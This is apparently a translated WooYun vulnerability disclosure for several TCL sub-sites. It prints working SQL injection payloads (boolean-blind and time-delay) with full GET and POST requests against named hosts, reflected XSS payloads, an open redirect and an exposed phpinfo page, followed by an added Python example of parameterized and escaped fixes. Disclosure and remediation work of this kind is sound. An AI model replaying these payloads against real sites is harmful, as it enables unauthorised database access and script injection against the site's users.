
Vulnerability Summary

Defect ID: wooyun-2014-066348

Title: TCL high-risk security vulnerability bundle (SQL injection, XSS, etc.)

Affected vendor: TCL official online store

Author: Eoh

Submitted: 2014-07-14 14:54

Fixed: 2014-08-28 14:56

Published: 2014-08-28 14:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2014-07-14: Details sent to the vendor, awaiting vendor handling
2014-07-14: Vendor confirmed; details disclosed to the vendor only
2014-07-24: Details disclosed to core white hats and experts in the relevant field
2014-08-03: Details disclosed to regular white hats
2014-08-13: Details disclosed to intern white hats
2014-08-28: Details disclosed to the public

Brief description:

Detailed description:

Multiple TCL sub-sites are affected by SQL injection.

Proof of vulnerability:

Blind SQL injection
http://battery.tcl.com
1. Parameter: smname
http://battery.tcl.com/read_products.php?smname=1'%22
2. Parameter: offset
http://battery.tcl.com/news_gs.php?offset=1'%22

[Screenshot: battery.png]


http://magazine.tcl.com
1. Parameter: txtuserid
* -1' OR 3*2*0=6 AND 000279=000279 -- => FALSE
* -1' OR 3*2*1=6 AND 000279=000279 -- => TRUE
POST request:
http://magazine.tcl.com/manager/login.aspx
bnok=%c8%b7%b6%a8&password=g00dPa%24%24w0rD&txtuserid=-1'%20OR%203*2*1%3d6%20AND%20000279%3d000279%20--%20&__EVENTVALIDATION=/wEWBAKZ8PLhCAKz8dzmCQLyveCRDwKti4TYC7mlf8tzPuNjnDolSoWfnjAXxdRb&__VIEWSTATE=/wEPDwUKMTQ2NTI5ODg0N2RkueS/f%2ba8T7EhKt660xbvO1hRf1k%3d
2. Parameter: txtuserid
* bFmvdmCl'; waitfor delay '0:0:9' -- => 9.048 s
* 1LSMNbtU'; waitfor delay '0:0:0' -- => 0.047 s
POST request:
http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=/en/manager/Default.aspx
bnok=%c8%b7%b6%a8&password=g00dPa%24%24w0rD&txtuserid=JfX0oI0u';%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=/wEWBAKahK3uBwKz8dzmCQLyveCRDwKti4TYCw2HPlKnknPK%2bRkeJ%2bbFTWFlpVtu&__VIEWSTATE=/wEPDwUKMTQ2NTI5ODg0N2RkgU6lqdIp0F6AB6xsrokPgosgFd4%3d
http://mitv.tcl.com
Parameter: emailType
* %40tcl.com' AND 3*2*0=6 AND '0002lOo'='0002lOo => FALSE
* %40tcl.com' AND 3*2*1=6 AND '0002lOo'='0002lOo => TRUE
POST request:
http://mitv.tcl.com/DRP/register/saveRegisterInfo
emailType=%2540tcl.com'%20AND%203*2*1%3d6%20AND%20'0002lOo'%3d'0002lOo&userRegisterInfo.currentPassword=g00dPa%24%24w0rD&userRegisterInfo.firstName=gfkvwwdv&userRegisterInfo.gender=F&userRegisterInfo.lastName=gfkvwwdv&userRegisterInfo.password=g00dPa%24%24w0rD&userRegisterInfo.userLoginId=gfkvwwdv
http://tclcom.tcl.com
Parameters: lang, year, tab, type
* (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.13 s
* (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.124 s
GET request:
http://tclcom.tcl.com/php/load_articles.php?lang=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&page=oannouncement&tab=0&type=8&year=2014
http://kt.tcl.com
Parameter: value(userName)
POST request:
http://kt.tcl.com/web/SubmitLogin.do
Submit=%e6%8f%90%20%e4%ba%a4&value(entcode)=&value(password)=g00dPa%24%24w0rD&value(userName)=1'%22
http://lighting.tcl.com
Parameter: ID
* 263 AND 3*2*0=6 AND 891=891 => FALSE
* 263 AND 3*2*1=6 AND 891=891 => TRUE
http://lighting.tcl.com/cn/products-d.aspx?ID=263%20AND%203*2*1%3d6%20AND%20891%3d891&SortID=95
Reflected XSS
Parameters: both loginname and name are affected
http://developer.tcl.com/devopen/reg2.jsp?activecode=&loginname=ecclfkif'%22()%26%25<ScRiPt%20>prompt(917830)</ScRiPt>&name=rhxgwmav
http://developer.tcl.com/devopen/repsw2.jsp?loginname=ukyntmxs%3CScRiPt%20%3Eprompt(966959)%3C/ScRiPt%3E
Parameter: page
http://tclcom.tcl.com/php/load_articles.php?lang=null&page=oannouncement'%20onmouseover%3dprompt(963089)%20bad%3d'&tab=1&type=8&year=2014
Parameter: cid
http://hao.tcl.com/view/product/product!show.action?cid=85%22%20onmouseover%3dprompt(913509)%20bad%3d%22&page.pageNo=e&page.pageSize=50&tid=
http://kt.tcl.com/web/DefaultLoginUser.do/</title>1<ScRiPt>prompt(969243)</ScRiPt>
URL redirect
http://developer.tcl.com/devopen/logsubmit.jsp?next=http://www.wooyun.org
phpinfo information disclosure
http://tclcom.tcl.com/info.php

Fix recommendation:

Filter dangerous characters and use parameterized SQL statements.
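The following is an added example, not code from the report or from TCL, showing the "before" pattern behind each finding class above next to the fix the report recommends: parameterized SQL for the injection points, output encoding for the reflected XSS, and destination validation for the `next` redirect. sqlite3 stands in for the real MySQL and MSSQL back ends; the product table, its rows, the function names and the default redirect path are all constructed for the demonstration.

```python
"""Added example (not part of the WooYun report): vulnerable patterns beside
their fixes. Table data, function names and the default path are constructed."""
import html
import sqlite3
from urllib.parse import urlparse


def make_db():
    """Constructed in-memory product table standing in for the real back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, sort_id INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(263, "Bulb A", 95), (264, "Bulb B", 95), (300, "Panel", 96)])
    return conn


# --- SQL injection, numeric parameter (the products-d.aspx?ID=... case) ------

def product_by_id_vulnerable(conn, id_param):
    """Before: the value is concatenated into the statement, so a boolean
    expression appended to the number silently changes the result set."""
    sql = "SELECT id, name FROM products WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def product_by_id_fixed(conn, id_param):
    """After: type-check the value, then bind it as a query parameter."""
    try:
        pid = int(id_param)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, name FROM products WHERE id = ?", (pid,)).fetchall()


# --- SQL injection, string parameter (the read_products.php?smname=... case) -

def search_vulnerable(conn, smname):
    """Before: a quote in the input ends the string literal; the 1'" probe
    from the report breaks the statement, returning None where the real site
    would show a database error."""
    sql = "SELECT id, name FROM products WHERE name = '" + smname + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def search_fixed(conn, smname):
    """After: the driver sends the value separately from the statement,
    so quote characters are data, never SQL."""
    return conn.execute("SELECT id, name FROM products WHERE name = ?", (smname,)).fetchall()


# --- Reflected XSS (the reg2.jsp?loginname=... case) --------------------------

def greeting_vulnerable(loginname):
    """Before: the parameter is echoed into the page unencoded."""
    return "<p>Hello " + loginname + "</p>"


def greeting_fixed(loginname):
    """After: HTML-encode at the output point; quote=True also encodes ' and ",
    so the same call is safe inside a quoted attribute value."""
    return "<p>Hello " + html.escape(loginname, quote=True) + "</p>"


# --- Open redirect (the logsubmit.jsp?next=... case) --------------------------

DEFAULT_NEXT = "/devopen/index.jsp"  # assumed landing page, constructed for the example


def safe_next(next_param, default=DEFAULT_NEXT):
    """Only a site-relative path may be used as the post-login destination.
    Anything carrying a scheme or host (http://..., //host/..., javascript:)
    or a backslash, which some browsers treat as a slash, falls back to default."""
    next_param = next_param or ""
    parsed = urlparse(next_param)
    if parsed.scheme or parsed.netloc:
        return default
    if not next_param.startswith("/") or next_param.startswith("//") or "\\" in next_param:
        return default
    return next_param


if __name__ == "__main__":
    db = make_db()
    print(product_by_id_vulnerable(db, "263 AND 3*2*1=6 AND 891=891"))  # row returned
    print(product_by_id_vulnerable(db, "263 AND 3*2*0=6 AND 891=891"))  # no row
    print(product_by_id_fixed(db, "263 AND 3*2*1=6 AND 891=891"))       # rejected
    print(search_vulnerable(db, "1'\""), search_fixed(db, "1'\""))
    print(greeting_fixed("<ScRiPt >prompt(1)</ScRiPt>"))
    print(safe_next("http://www.wooyun.org"), safe_next("/devopen/profile.jsp"))
```

The numeric case is the one the report demonstrates with `3*2*1=6` versus `3*2*0=6`: with concatenation the appended expression decides whether the row comes back, which is the boolean-blind signal; with a bound integer the same input is simply rejected. The string case shows why "filtering dangerous characters" alone is weaker than binding: no character list needs maintaining when the value never reaches the SQL parser as code.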

Copyright notice: when reposting, please credit the source: Eoh@WooYun


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-07-14 15:30

Vendor reply:

Thank you for your attention; this has been forwarded to the relevant unit for confirmation and handling.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-08-03 23:37 | 深蓝 ( Regular white hat | Rank:960 Vulnerabilities:220 | We are not crackers, we are hackers; we defend the Internet...)

    10 WB, haha, shameless.